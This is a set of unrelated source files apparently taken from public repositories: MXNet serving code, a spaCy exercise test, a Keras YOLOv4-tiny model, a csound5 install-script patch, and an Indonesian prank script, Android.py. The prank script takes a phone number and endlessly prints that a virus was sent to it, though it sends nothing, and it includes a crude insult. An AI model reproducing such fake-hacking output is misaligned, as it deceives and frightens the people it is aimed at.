3e826a5b388244c0588b7bb916184750997ab272
|
[
"Apache-2.0"
] | 1,077 |
2019-05-09T02:50:53.000Z
|
2022-03-27T11:05:32.000Z
|
import mxnet as mx
import requests
import zipfile
import json
import shutil
import os
import numpy as np
from mxnet.io import DataBatch
from mms.log import get_logger
from mms.model_service.mxnet_model_service import MXNetBaseService
from mms.utils.mxnet import image, ndarray
logger = get_logger()
def check_input_shape(inputs, signature):
'''Check input data shape consistency with signature.
Parameters
----------
inputs : List of NDArray
Input data in NDArray format.
signature : dict
Dictionary containing model signature.
'''
assert isinstance(inputs, list), 'Input data must be a list.'
assert len(inputs) == len(signature['inputs']), 'Input number mismatches with ' \
'signature. %d expected but got %d.' \
% (len(signature['inputs']), len(inputs))
for input, sig_input in zip(inputs, signature['inputs']):
assert isinstance(input, mx.nd.NDArray), 'Each input must be NDArray.'
assert len(input.shape) == \
len(sig_input['data_shape']), 'Shape dimension of input %s mismatches with ' \
'signature. %d expected but got %d.' \
% (sig_input['data_name'], len(sig_input['data_shape']),
len(input.shape))
for idx in range(len(input.shape)):
if idx != 0 and sig_input['data_shape'][idx] != 0:
assert sig_input['data_shape'][idx] == \
input.shape[idx], 'Input %s has different shape with ' \
'signature. %s expected but got %s.' \
% (sig_input['data_name'], sig_input['data_shape'],
input.shape)
class DLSMXNetBaseService(MXNetBaseService):
'''MXNetBaseService defines the fundamental loading model and inference
operations when serving MXNet model. This is a base class and needs to be
inherited.
'''
def __init__(self, model_name, model_dir, manifest, gpu=None):
print ("-------------------- init classification servive -------------")
self.model_name = model_name
self.ctx = mx.gpu(int(gpu)) if gpu is not None else mx.cpu()
self._signature = manifest['Model']['Signature']
data_names = []
data_shapes = []
for input in self._signature['inputs']:
data_names.append(input['data_name'])
# Replace 0 entry in data shape with 1 for binding executor.
# Set batch size as 1
data_shape = input['data_shape']
data_shape[0] = 1
for idx in range(len(data_shape)):
if data_shape[idx] == 0:
data_shape[idx] = 1
data_shapes.append(('data', tuple(data_shape)))
# Load MXNet module
epoch = 0
try:
param_filename = manifest['Model']['Parameters']
epoch = int(param_filename[len(model_name) + 1: -len('.params')])
except Exception as e:
logger.warning('Failed to parse epoch from param file, setting epoch to 0')
sym, arg_params, aux_params = mx.model.load_checkpoint('%s/%s' % (model_dir, manifest['Model']['Symbol'][:-12]), epoch)
self.mx_model = mx.mod.Module(symbol=sym, context=self.ctx,
data_names=['data'], label_names=None)
self.mx_model.bind(for_training=False, data_shapes=data_shapes)
self.mx_model.set_params(arg_params, aux_params, allow_missing=True)
def _preprocess(self, data):
img_list = []
for idx, img in enumerate(data):
input_shape = self.signature['inputs'][idx]['data_shape']
# We are assuming input shape is NCHW
[h, w] = input_shape[2:]
if input_shape[1] == 1:
img_arr = image.read(img, 0)
else:
img_arr = image.read(img)
img_arr = image.resize(img_arr, w, h)
img_arr = image.transform_shape(img_arr)
img_list.append(img_arr)
return img_list
def _postprocess(self, data):
dim = len(data[0].shape)
if dim > 2:
data = mx.nd.array(np.squeeze(data.asnumpy(), axis=tuple(range(dim)[2:])))
sorted_prob = mx.nd.argsort(data[0], is_ascend=False)
top_prob = map(lambda x: int(x.asscalar()), sorted_prob[0:5])
return [{'probability': float(data[0, i].asscalar()), 'class': i}
for i in top_prob]
def _inference(self, data):
'''Internal inference methods for MXNet. Run forward computation and
return output.
Parameters
----------
data : list of NDArray
Preprocessed inputs in NDArray format.
Returns
-------
list of NDArray
Inference output.
'''
# Check input shape
check_input_shape(data, self.signature)
data = [item.as_in_context(self.ctx) for item in data]
self.mx_model.forward(DataBatch(data))
return self.mx_model.get_outputs()[0]
def ping(self):
'''Ping to get system's health.
Returns
-------
String
MXNet version to show system is healthy.
'''
return mx.__version__
@property
def signature(self):
        '''Signature for model service.
        Returns
        -------
        Dict
            Model service signature.
        '''
return self._signature
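# --- Hedged example (added; the signature below is illustrative, not from a real manifest) ---
# check_input_shape() walks the signature entry by entry; the batch dimension
# (index 0) and any signature dimension declared as 0 are left unconstrained.
def _demo_check_input_shape():
    signature = {'inputs': [{'data_name': 'data', 'data_shape': [0, 1, 28, 28]}]}
    batch = [mx.nd.zeros((1, 1, 28, 28))]
    check_input_shape(batch, signature)  # passes silently; mismatches raise AssertionError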
| 37.824324 | 127 | 0.566988 |
7ca1ea0ffc65c25b30e5f446ccbca20cf80ccd6a
| 553 |
py
|
Python
|
exercises/pt/test_03_10_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 2,085 |
2019-04-17T13:10:40.000Z
|
2022-03-30T21:51:46.000Z
|
exercises/pt/test_03_10_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 79 |
2019-04-18T14:42:55.000Z
|
2022-03-07T08:15:43.000Z
|
exercises/pt/test_03_10_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 361 |
2019-04-17T13:34:32.000Z
|
2022-03-28T04:42:45.000Z
|
def test():
    assert Doc.has_extension("has_number"), "Did you register the extension on the Doc?"
    ext = Doc.get_extension("has_number")
    assert ext[2] is not None, "Did you set the getter correctly?"
    assert (
        "getter=get_has_number" in __solution__
    ), "Did you assign the function get_has_number as the getter?"
    assert "doc._.has_number" in __solution__, "Are you accessing the custom attribute?"
    assert doc._.has_number, "It looks like the getter function is returning the wrong value."
    __msg__.good("Good job!")
| 46.083333 | 94 | 0.717902 |
6b31f06182219ab8ebe4752adf4b18d4b079f30e
| 13,283 |
py
|
Python
|
nets/yolo4_tiny.py
|
Rory-Godwin/FOLO
|
32b4773cec99edc6ce7baff9c113eba4f8dc1d29
|
[
"MIT"
] | null | null | null |
nets/yolo4_tiny.py
|
Rory-Godwin/FOLO
|
32b4773cec99edc6ce7baff9c113eba4f8dc1d29
|
[
"MIT"
] | null | null | null |
nets/yolo4_tiny.py
|
Rory-Godwin/FOLO
|
32b4773cec99edc6ce7baff9c113eba4f8dc1d29
|
[
"MIT"
] | null | null | null |
from functools import wraps
import numpy as np
import tensorflow as tf
from keras import backend as K
from keras.layers import (Add, Concatenate, Conv2D, MaxPooling2D, UpSampling2D,
ZeroPadding2D)
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.normalization import BatchNormalization
from keras.models import Model
from keras.regularizers import l2
from utils.utils import compose
from nets.CSPdarknet53_tiny import darknet_body
#--------------------------------------------------#
#   Single convolution: DarknetConv2D
#   If the stride is 2, set the padding mode explicitly.
#   Testing showed better results without l2 regularization, so it was removed.
#--------------------------------------------------#
@wraps(Conv2D)
def DarknetConv2D(*args, **kwargs):
# darknet_conv_kwargs = {'kernel_regularizer': l2(5e-4)}
darknet_conv_kwargs = {}
darknet_conv_kwargs['padding'] = 'valid' if kwargs.get('strides')==(2,2) else 'same'
darknet_conv_kwargs.update(kwargs)
return Conv2D(*args, **darknet_conv_kwargs)
#---------------------------------------------------#
#   Convolution block:
#   DarknetConv2D + BatchNormalization + LeakyReLU
#---------------------------------------------------#
def DarknetConv2D_BN_Leaky(*args, **kwargs):
no_bias_kwargs = {'use_bias': False}
no_bias_kwargs.update(kwargs)
return compose(
DarknetConv2D(*args, **no_bias_kwargs),
BatchNormalization(),
LeakyReLU(alpha=0.1))
#---------------------------------------------------#
#   Feature layers -> final outputs
#---------------------------------------------------#
#######################################################################################
####### RG FOLOv2 #######
####### 08/04/2021 #######
####### OUT 67 IN 62,66 #######
####### MOD 61,68,70,71 ADDED 77,78 #######
#######################################################################################
def yolo_body(inputs, num_anchors, num_classes):
    #---------------------------------------------------#
    #   Build the CSPdarknet53_tiny backbone.
    #   feat1 has shape 26,26,256
    #   feat2 has shape 13,13,512
    #---------------------------------------------------#
feat1, feat2 = darknet_body(inputs)
P5 = DarknetConv2D_BN_Leaky(256, (1,1))(feat2)
P5 = DarknetConv2D_BN_Leaky(512, (3,3))(P5)
P5 = DarknetConv2D_BN_Leaky(256, (1,1))(P5)
    # SPP structure: max pooling at several scales, then the results are stacked.
    # (Note: maxpool3 computed below is not included in the concatenation.)
maxpool1 = MaxPooling2D(pool_size=(13,13), strides=(1,1), padding='same')(P5)
maxpool2 = MaxPooling2D(pool_size=(9,9), strides=(1,1), padding='same')(P5)
maxpool3 = MaxPooling2D(pool_size=(5,5), strides=(1,1), padding='same')(P5)
P5 = Concatenate()([maxpool1, maxpool2, P5])
P5 = DarknetConv2D_BN_Leaky(256, (1,1))(P5)
P5 = DarknetConv2D_BN_Leaky(512, (3,3))(P5)
P5 = DarknetConv2D_BN_Leaky(256, (1,1))(P5)
P5 = DarknetConv2D_BN_Leaky(512, (3,3))(P5)
P5 = DarknetConv2D_BN_Leaky(256, (1,1))(P5)
# 13,13,512 -> 13,13,256 -> 26,26,256
P5_upsample = compose(DarknetConv2D_BN_Leaky(256, (1,1)), UpSampling2D(2))(P5)
# 26,26,512 -> 26,26,256
P4 = DarknetConv2D_BN_Leaky(256, (1,1))(feat1)
P4 = DarknetConv2D_BN_Leaky(512, (3,3))(P4)
P4 = DarknetConv2D_BN_Leaky(256, (1,1))(P4)
maxpool1 = MaxPooling2D(pool_size=(13,13), strides=(1,1), padding='same')(P4)
maxpool2 = MaxPooling2D(pool_size=(9,9), strides=(1,1), padding='same')(P4)
P4 = Concatenate()([maxpool1, maxpool2, P4])
P4 = DarknetConv2D_BN_Leaky(256, (1,1))(P4)
P4 = DarknetConv2D_BN_Leaky(512, (3,3))(P4)
# 26,26,256 + 26,26,256 -> 26,26,512
P4 = Concatenate()([P4, P5_upsample])
    #---------------------------------------------------#
    #   Second feature layer
    #   y2 = (batch_size, 26, 26, 3, 85)
    #---------------------------------------------------#
P4_output = DarknetConv2D_BN_Leaky(512, (3,3))(P4)
P4_output = DarknetConv2D(num_anchors*(num_classes+5), (1,1))(P4_output)
    #---------------------------------------------------#
    #   First feature layer
    #   y1 = (batch_size, 13, 13, 3, 85)
    #---------------------------------------------------#
P5_output = DarknetConv2D_BN_Leaky(512, (3,3))(P5)
P5_output = DarknetConv2D(num_anchors*(num_classes+5), (1,1))(P5_output)
return Model(inputs, [P5_output, P4_output])
#---------------------------------------------------#
#   Decode each feature layer's raw predictions into real values
#---------------------------------------------------#
def yolo_head(feats, anchors, num_classes, input_shape, calc_loss=False):
num_anchors = len(anchors)
#---------------------------------------------------#
# [1, 1, 1, num_anchors, 2]
#---------------------------------------------------#
anchors_tensor = K.reshape(K.constant(anchors), [1, 1, 1, num_anchors, 2])
    #---------------------------------------------------#
    #   Build the x,y grid
    #   (13, 13, 1, 2)
    #---------------------------------------------------#
grid_shape = K.shape(feats)[1:3]
grid_y = K.tile(K.reshape(K.arange(0, stop=grid_shape[0]), [-1, 1, 1, 1]),
[1, grid_shape[1], 1, 1])
grid_x = K.tile(K.reshape(K.arange(0, stop=grid_shape[1]), [1, -1, 1, 1]),
[grid_shape[0], 1, 1, 1])
grid = K.concatenate([grid_x, grid_y])
grid = K.cast(grid, K.dtype(feats))
    #---------------------------------------------------#
    #   Reshape predictions to (batch_size, 13, 13, 3, 85).
    #   85 splits into 4 + 1 + 80:
    #   4  -> box centre/size adjustment parameters
    #   1  -> objectness confidence
    #   80 -> class confidences
    #---------------------------------------------------#
feats = K.reshape(feats, [-1, grid_shape[0], grid_shape[1], num_anchors, num_classes + 5])
    #---------------------------------------------------#
    #   Turn raw predictions into real values:
    #   box_xy is the box centre
    #   box_wh is the box width and height
    #---------------------------------------------------#
box_xy = (K.sigmoid(feats[..., :2]) + grid) / K.cast(grid_shape[::-1], K.dtype(feats))
box_wh = K.exp(feats[..., 2:4]) * anchors_tensor / K.cast(input_shape[::-1], K.dtype(feats))
box_confidence = K.sigmoid(feats[..., 4:5])
box_class_probs = K.sigmoid(feats[..., 5:])
    #---------------------------------------------------------------------#
    #   When computing the loss, return grid, feats, box_xy, box_wh;
    #   at inference time, return box_xy, box_wh, box_confidence, box_class_probs.
    #---------------------------------------------------------------------#
if calc_loss == True:
return grid, feats, box_xy, box_wh
return box_xy, box_wh, box_confidence, box_class_probs
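#---------------------------------------------------#
#   Hedged NumPy sketch (added by the editor, not part of the original repo):
#   the decode performed by yolo_head for one cell and one anchor, assuming the
#   anchor (aw, ah) and input size (in_w, in_h) are given in pixels.
#---------------------------------------------------#
def _decode_one_cell(tx, ty, tw, th, gx, gy, grid_w, grid_h, aw, ah, in_w, in_h):
    sigmoid = lambda v: 1.0 / (1.0 + np.exp(-v))
    bx = (sigmoid(tx) + gx) / grid_w   # centre x as a fraction of input width
    by = (sigmoid(ty) + gy) / grid_h   # centre y as a fraction of input height
    bw = np.exp(tw) * aw / in_w        # width as a fraction of input width
    bh = np.exp(th) * ah / in_h        # height as a fraction of input height
    return bx, by, bw, bh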
#---------------------------------------------------#
#   Adjust boxes so they match the original image
#---------------------------------------------------#
def yolo_correct_boxes(box_xy, box_wh, input_shape, image_shape):
    #-----------------------------------------------------------------#
    #   The y axis comes first so boxes multiply conveniently with the
    #   image height/width.
    #-----------------------------------------------------------------#
box_yx = box_xy[..., ::-1]
box_hw = box_wh[..., ::-1]
input_shape = K.cast(input_shape, K.dtype(box_yx))
image_shape = K.cast(image_shape, K.dtype(box_yx))
new_shape = K.round(image_shape * K.min(input_shape/image_shape))
    #-----------------------------------------------------------------#
    #   offset is the shift of the valid image area relative to the
    #   top-left corner; new_shape is the rescaled width/height.
    #-----------------------------------------------------------------#
offset = (input_shape-new_shape)/2./input_shape
scale = input_shape/new_shape
box_yx = (box_yx - offset) * scale
box_hw *= scale
box_mins = box_yx - (box_hw / 2.)
box_maxes = box_yx + (box_hw / 2.)
boxes = K.concatenate([
box_mins[..., 0:1], # y_min
box_mins[..., 1:2], # x_min
box_maxes[..., 0:1], # y_max
box_maxes[..., 1:2] # x_max
])
boxes *= K.concatenate([image_shape, image_shape])
return boxes
#---------------------------------------------------#
#   Get each box and its score
#---------------------------------------------------#
def yolo_boxes_and_scores(feats, anchors, num_classes, input_shape, image_shape, letterbox_image):
    #-----------------------------------------------------------------#
    #   Turn raw predictions into real values:
    #   box_xy : -1,13,13,3,2;
    #   box_wh : -1,13,13,3,2;
    #   box_confidence : -1,13,13,3,1;
    #   box_class_probs : -1,13,13,3,80;
    #-----------------------------------------------------------------#
box_xy, box_wh, box_confidence, box_class_probs = yolo_head(feats, anchors, num_classes, input_shape)
    #-----------------------------------------------------------------#
    #   Before the image is fed to the network, letterbox_image pads it
    #   with gray bars, so box_xy and box_wh are relative to the padded
    #   image. Correct them to remove the padding, and convert box_xy and
    #   box_wh into y_min, y_max, x_min, x_max.
    #-----------------------------------------------------------------#
if letterbox_image:
boxes = yolo_correct_boxes(box_xy, box_wh, input_shape, image_shape)
else:
box_yx = box_xy[..., ::-1]
box_hw = box_wh[..., ::-1]
box_mins = box_yx - (box_hw / 2.)
box_maxes = box_yx + (box_hw / 2.)
input_shape = K.cast(input_shape, K.dtype(box_yx))
image_shape = K.cast(image_shape, K.dtype(box_yx))
boxes = K.concatenate([
box_mins[..., 0:1] * image_shape[0], # y_min
box_mins[..., 1:2] * image_shape[1], # x_min
box_maxes[..., 0:1] * image_shape[0], # y_max
box_maxes[..., 1:2] * image_shape[1] # x_max
])
    #-----------------------------------------------------------------#
    #   Get the final scores and box positions
    #-----------------------------------------------------------------#
boxes = K.reshape(boxes, [-1, 4])
box_scores = box_confidence * box_class_probs
box_scores = K.reshape(box_scores, [-1, num_classes])
return boxes, box_scores
#---------------------------------------------------#
#   Image prediction
#---------------------------------------------------#
def yolo_eval(yolo_outputs,
anchors,
num_classes,
image_shape,
max_boxes=20,
score_threshold=.6,
iou_threshold=.5,
letterbox_image=True):
    #---------------------------------------------------#
    #   Get the number of feature layers; the full model has 3 effective
    #   feature layers (the tiny model used here has 2, see anchor_mask).
    #---------------------------------------------------#
num_layers = len(yolo_outputs)
    #-----------------------------------------------------------#
    #   The 13x13 feature layer uses anchors [81,82], [135,169], [344,319];
    #   the 26x26 feature layer uses anchors [23,27], [37,58], [81,82].
    #-----------------------------------------------------------#
anchor_mask = [[6,7,8], [3,4,5], [0,1,2]] if num_layers==3 else [[3,4,5], [1,2,3]]
    #-----------------------------------------------------------#
    #   This is the network input size, usually 416x416.
    #-----------------------------------------------------------#
input_shape = K.shape(yolo_outputs[0])[1:3] * 32
boxes = []
box_scores = []
    #-----------------------------------------------------------#
    #   Process each feature layer
    #-----------------------------------------------------------#
for l in range(num_layers):
_boxes, _box_scores = yolo_boxes_and_scores(yolo_outputs[l], anchors[anchor_mask[l]], num_classes, input_shape, image_shape, letterbox_image)
boxes.append(_boxes)
box_scores.append(_box_scores)
    #-----------------------------------------------------------#
    #   Stack the results from all feature layers
    #-----------------------------------------------------------#
boxes = K.concatenate(boxes, axis=0)
box_scores = K.concatenate(box_scores, axis=0)
    #-----------------------------------------------------------#
    #   Keep only scores above score_threshold
    #-----------------------------------------------------------#
mask = box_scores >= score_threshold
max_boxes_tensor = K.constant(max_boxes, dtype='int32')
boxes_ = []
scores_ = []
classes_ = []
for c in range(num_classes):
        #-----------------------------------------------------------#
        #   Take all boxes (and their scores) with box_scores >= score_threshold
        #-----------------------------------------------------------#
class_boxes = tf.boolean_mask(boxes, mask[:, c])
class_box_scores = tf.boolean_mask(box_scores[:, c], mask[:, c])
        #-----------------------------------------------------------#
        #   Non-maximum suppression:
        #   keep the highest-scoring box within each region
        #-----------------------------------------------------------#
nms_index = tf.image.non_max_suppression(
class_boxes, class_box_scores, max_boxes_tensor, iou_threshold=iou_threshold)
        #-----------------------------------------------------------#
        #   Gather the results after NMS:
        #   box positions, scores and classes
        #-----------------------------------------------------------#
class_boxes = K.gather(class_boxes, nms_index)
class_box_scores = K.gather(class_box_scores, nms_index)
classes = K.ones_like(class_box_scores, 'int32') * c
boxes_.append(class_boxes)
scores_.append(class_box_scores)
classes_.append(classes)
boxes_ = K.concatenate(boxes_, axis=0)
scores_ = K.concatenate(scores_, axis=0)
classes_ = K.concatenate(classes_, axis=0)
return boxes_, scores_, classes_
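#---------------------------------------------------#
#   Hedged mini-demo (added by the editor; the scores are made up):
#   the same thresholding idea as the mask above, in plain numpy.
#---------------------------------------------------#
def _demo_score_filter(score_threshold=0.6):
    box_scores = np.array([[0.9, 0.1], [0.3, 0.7]])  # 2 boxes x 2 classes
    mask = box_scores >= score_threshold
    # -> keeps (box 0, class 0) and (box 1, class 1)
    return [(b, c) for b in range(2) for c in range(2) if mask[b, c]]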
| 42.848387 | 149 | 0.443424 |
865dc4ddf79c635bc688a33bc3eb6b1fd49bd885
| 17,227 |
py
|
Python
|
Virus-Fake-main/Android.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
Virus-Fake-main/Android.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
Virus-Fake-main/Android.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
import os,time,sys
from datetime import datetime
def ketik(teks):
for i in teks + "\n":
sys.stdout.write(i)
sys.stdout.flush()
time.sleep(0.01)
#kqng ricod
saat_ini = datetime.now()
tgl = saat_ini.strftime('%d')
bln = saat_ini.strftime('%m')
thn = saat_ini.strftime('%Y')
waktu_new = (tgl+"-"+bln+"-"+thn)
xnxx="\033[85m"
q="\033[00m"
h2="\033[40m"
b2="\033[44m"
c2="\033[46m"
i2="\033[42m"
u2="\033[45m"
m2="\033[41m"
p2="\033[47m"
k2="\033[43m"
b='\033[1;34m'
i='\033[1;32m'
c='\033[1;36m'
m='\033[1;31m'
u='\033[1;35m'
k='\033[1;33m'
p='\033[1;37m'
h='\033[1;90m'
k3="\033[43m\033[1;37m"
b3="\033[44m\033[1;37m"
m3="\033[41m\033[1;37m"
os.system("clear")
ketik(m +" .---. .----------- ")
ketik(m +" / \ __ / ------ "+ k +" ["+ m +" VIRUS ANDROID"+ k +" ]")
ketik(m +" / / \( )/ ----- ")
ketik(m +" ////// ' \/ ` --- "+ p +" ➣"+ k +" Creator"+ m +" :"+ h +" ALDI BACHTIAR RIFAI")
ketik(m +" //// / // : : --- "+ p +" ➣"+ k +" Youtube"+ m +" :"+ h +" MR.1557 / B0C4H")
ketik(p +" // / / /` '-- "+ p +" ➣"+ k +" Github"+ m +" :"+ h +" https://github.com/Aldi098")
ketik(p +" // //..\\ ")
ketik(p +" ====UU====UU==== "+ k +" ["+ m +" VERSI 0.2"+ k +" ]")
ketik(p +" '//||\\` ")
ketik(p +" ''`` ")
ketik("")
try:
    isi = input(p +" ➣"+ k +" Enter Number "+ m +": "+ i)
    mulai = input(p +" ➣"+ k +" Continue?"+ i +" y"+ k +"/"+ m +"t "+ m +": "+ i)
    print("")
    print("")
except (KeyboardInterrupt,EOFError):
    ketik (m +' !'+ p +' BAY KONTOL!!')
    sys.exit()
if mulai == "y":
    print(m +" !"+ k +" Virus"+ p +" Is Being Prepared")
    time.sleep(2)
    print("")
    ulang = 1000000000000000000000000000000000000000000000000
    for i in range(ulang):
        time.sleep(0.01)
        print ("\033[1;32m ✓{} Successfully Sent{} Virus{} To Number >{} {}".format(p, m, p, k, isi))
elif mulai == "t":
    print (m +" !"+ p +" program stopped")
else:
    print (m +" !"+ p +" not available")
| 2.936254 | 111 | 0.500203 |
865ff16740b4c73a1f376881389830505589cda0
| 12,056 |
py
|
Python
|
source/pkgsrc/audio/csound5/patches/patch-install.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1 |
2021-11-20T22:46:39.000Z
|
2021-11-20T22:46:39.000Z
|
source/pkgsrc/audio/csound5/patches/patch-install.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | null | null | null |
source/pkgsrc/audio/csound5/patches/patch-install.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | null | null | null |
$NetBSD: patch-install.py,v 1.4 2019/11/06 11:56:56 mrg Exp $
python 3.x support
don't fake-conflict with csound6.
--- install.py.orig 2013-01-07 04:49:35.000000000 -0800
+++ install.py 2019-11-06 03:43:25.554498784 -0800
@@ -3,7 +3,6 @@
import sys
import os
import re
-import md5
import time
# get Python version
@@ -28,13 +27,14 @@
'scsort', 'extract', 'cs', 'csb64enc', 'makecsd', 'scot']
exeFiles2 = ['brkpt', 'linseg', 'tabdes']
+exeFiles2 = []
docFiles = ['COPYING', 'ChangeLog', 'INSTALL', 'readme-csound5.txt']
# -----------------------------------------------------------------------------
-print 'Csound5 Linux installer by Istvan Varga'
-print ''
+print('Csound5 Linux installer by Istvan Varga')
+print('')
prefix = '/usr/local'
instDir = '/'
@@ -47,14 +47,14 @@
word64Suffix = ''
def printUsage():
- print "Usage: ./install.py [options...]"
- print "Allowed options are:"
- print " --prefix=DIR base directory (default: /usr/local)"
- print " --instdir=DIR installation root directory (default: /)"
- print " --vimdir=DIR VIM runtime directory (default: none)"
- print " --word64 install libraries to 'lib64' instead of 'lib'"
- print " --help print this message"
- print ""
+ print("Usage: ./install.py [options...]")
+ print("Allowed options are:")
+ print(" --prefix=DIR base directory (default: /usr/local)")
+ print(" --instdir=DIR installation root directory (default: /)")
+ print(" --vimdir=DIR VIM runtime directory (default: none)")
+ print(" --word64 install libraries to 'lib64' instead of 'lib'")
+ print(" --help print this message")
+ print("")
# parse command line options
@@ -73,10 +73,10 @@
word64Suffix = '64'
else:
printUsage()
- print 'Error: unknown option: %s' % sys.argv[i]
+ print('Error: unknown option: %s' % sys.argv[i])
raise SystemExit(1)
-print prefix
+print(prefix)
# concatenates a list of directory names,
# and returns full path without a trailing '/'
@@ -96,15 +96,15 @@
return s
# frontends
-binDir = concatPath([prefix, '/bin'])
+binDir = concatPath([prefix, '/lib/csound5'])
# Csound API header files
-includeDir = concatPath([prefix, '/include/csound'])
+includeDir = concatPath([prefix, '/include/csound5'])
# Csound API libraries
-libDir = concatPath([prefix, '/lib' + word64Suffix])
+libDir = concatPath([prefix, '/lib/csound5' + word64Suffix])
# single precision plugin libraries
-pluginDir32 = concatPath([libDir, '/csound/plugins'])
+pluginDir32 = concatPath([libDir, '/plugins'])
# double precision plugin libraries
-pluginDir64 = concatPath([libDir, '/csound/plugins64'])
+pluginDir64 = concatPath([libDir, '/plugins64'])
# XMG files
xmgDir = concatPath([prefix, '/share/locale'])
# documentation
@@ -128,7 +128,7 @@
def makeDir(dirName):
try:
- os.makedirs(concatPath([instDir, dirName]), 0755)
+ os.makedirs(concatPath([instDir, dirName]), 0o755)
except:
pass
@@ -158,9 +158,9 @@
err = runCmd(['strip', stripMode, fullName])
if err == 0:
addMD5(fullName, fileName)
- print ' %s' % fileName
+ print(' %s' % fileName)
else:
- print ' *** error copying %s' % fileName
+ print(' *** error copying %s' % fileName)
return err
def installFile(src, dst):
@@ -195,9 +195,9 @@
addMD5(concatPath([instDir, src]), linkName)
else:
addMD5(concatPath([instDir, linkName]), linkName)
- print ' %s' % linkName
+ print(' %s' % linkName)
else:
- print ' *** error copying %s' % linkName
+ print(' *** error copying %s' % linkName)
return err
def findFiles(dir, pat):
@@ -218,30 +218,30 @@
makeDir(concatPath([binDir]))
installedBinaries = findFiles(concatPath([instDir, binDir]), '.+')
-if ('csound' in installedBinaries) or ('csound64' in installedBinaries):
+if ('csound5' in installedBinaries) or ('csound64' in installedBinaries):
if 'uninstall-csound5' in installedBinaries:
- print ' *** WARNING: found an already existing installation of Csound'
+ print(' *** WARNING: found an already existing installation of Csound')
tmp = ''
while (tmp != 'yes\n') and (tmp != 'no\n'):
sys.__stderr__.write(
' *** Uninstall it ? Type \'yes\', or \'no\' to quit: ')
tmp = sys.__stdin__.readline()
if tmp != 'yes\n':
- print ' *** Csound installation has been aborted'
- print ''
+ print(' *** Csound installation has been aborted')
+ print('')
raise SystemExit(1)
- print ' --- Removing old Csound installation...'
+ print(' --- Removing old Csound installation...')
runCmd([concatPath([instDir, binDir, 'uninstall-csound5'])])
- print ''
+ print('')
else:
- print ' *** Error: an already existing installation of Csound was found'
- print ' *** Try removing it first, and then run this script again'
- print ''
+ print(' *** Error: an already existing installation of Csound was found')
+ print(' *** Try removing it first, and then run this script again')
+ print('')
raise SystemExit(1)
# copy binaries
-print ' === Installing executables ==='
+print(' === Installing executables ===')
for i in exeFiles1:
if findFiles('.', i).__len__() > 0:
err = installXFile('--strip-unneeded', i, binDir)
@@ -253,7 +253,7 @@
# copy libraries
-print ' === Installing libraries ==='
+print(' === Installing libraries ===')
libList = findFiles('.', 'libcsound\\.a')
libList += findFiles('.', 'libcsound64\\.a')
libList += findFiles('.', 'libcsound\\.so\\..+')
@@ -280,7 +280,7 @@
# copy plugin libraries
-print ' === Installing plugins ==='
+print(' === Installing plugins ===')
if not useDouble:
pluginDir = pluginDir32
else:
@@ -297,13 +297,13 @@
# copy header files
-print ' === Installing header files ==='
+print(' === Installing header files ===')
err = installFiles(headerFiles, includeDir)
installErrors = installErrors or err
# copy language interfaces
-print ' === Installing language interfaces ==='
+print(' === Installing language interfaces ===')
wrapperList = [['csnd\\.py', '0', pythonDir],
['loris\\.py', '0', pythonDir],
['CsoundVST\\.py', '0', pythonDir],
@@ -327,7 +327,7 @@
# copy XMG files
-print ' === Installing Localisation files ==='
+print(' === Installing Localisation files ===')
xmgList = findFiles('.', '.+\\.xmg')
if xmgList.__len__() > 0:
err = installFiles(xmgList, xmgDir)
@@ -341,34 +341,34 @@
err = runCmd(['install', '-p', '-m', '0644', src, fileName])
if err == 0:
addMD5(fileName, fileName)
- print ' %s' % fileName
+ print(' %s' % fileName)
else:
- print ' *** error copying %s' % fileName
+ print(' *** error copying %s' % fileName)
installErrors = installErrors or err
# Copy documentation
-print ' === Installing documentation ==='
+print(' === Installing documentation ===')
err = installFiles(docFiles, docDir)
installErrors = installErrors or err
# copy Tcl/Tk files
-print ' === Installing Tcl/Tk modules and scripts ==='
+print(' === Installing Tcl/Tk modules and scripts ===')
if findFiles('.', 'tclcsound\\.so').__len__() > 0:
err = installXFile('--strip-unneeded', 'tclcsound.so', tclDir)
installErrors = installErrors or err
err = installFile('frontends/tclcsound/command_summary.txt', tclDir)
installErrors = installErrors or err
-err = installFile('nsliders.tk', tclDir)
-installErrors = installErrors or err
-err = installXFile('', 'matrix.tk', binDir)
+ err = installFile('nsliders.tk', tclDir)
+ installErrors = installErrors or err
+ err = installXFile('', 'matrix.tk', binDir)
installErrors = installErrors or err
# copy STK raw wave files
if '%s/libstk.so' % pluginDir in fileList:
- print ' === Installing STK raw wave files ==='
+ print(' === Installing STK raw wave files ===')
rawWaveFiles = []
for fName in os.listdir('./Opcodes/stk/rawwaves'):
if re.match('^.*\.raw$', fName) != None:
@@ -397,11 +397,11 @@
except:
pdDir = ''
if pdDir != '':
- print ' === Installing csoundapi~ PD object ==='
+ print(' === Installing csoundapi~ PD object ===')
err = installXFile('--strip-unneeded', 'csoundapi~.pd_linux', pdDir)
if err == 0:
try:
- os.chmod(concatPath([instDir, pdDir, 'csoundapi~.pd_linux']), 0644)
+ os.chmod(concatPath([instDir, pdDir, 'csoundapi~.pd_linux']), 0o644)
except:
err = -1
installErrors = installErrors or err
@@ -409,7 +409,7 @@
# copy VIM files if enabled
if vimDir != '':
- print ' === Installing VIM syntax files ==='
+ print(' === Installing VIM syntax files ===')
err = installXFile('', 'installer/misc/vim/cshelp', binDir)
